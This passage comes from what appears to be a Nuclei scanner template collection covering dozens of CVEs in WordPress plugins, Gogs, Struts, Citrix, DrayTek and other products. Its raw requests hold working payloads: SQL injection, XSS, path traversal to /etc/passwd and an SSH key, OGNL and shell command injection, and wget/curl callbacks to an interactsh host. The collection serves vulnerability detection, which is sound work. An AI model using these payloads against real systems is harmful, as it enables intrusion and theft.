HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","len(body_1) == 0","status_code_1 == 302","contains(body_2, \"Cryptocurrency Widgets Pack\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13638","info":{"name":"rConfig 3.9 - Authentication Bypass(Admin Login)","severity":"critical"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"passconf\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"editid\"\n\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--01b28e152ee044338224bf647275f8eb--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["rConfig - Configuration Management","Logged in as","dashboadFieldSet"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Event Espresso","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: 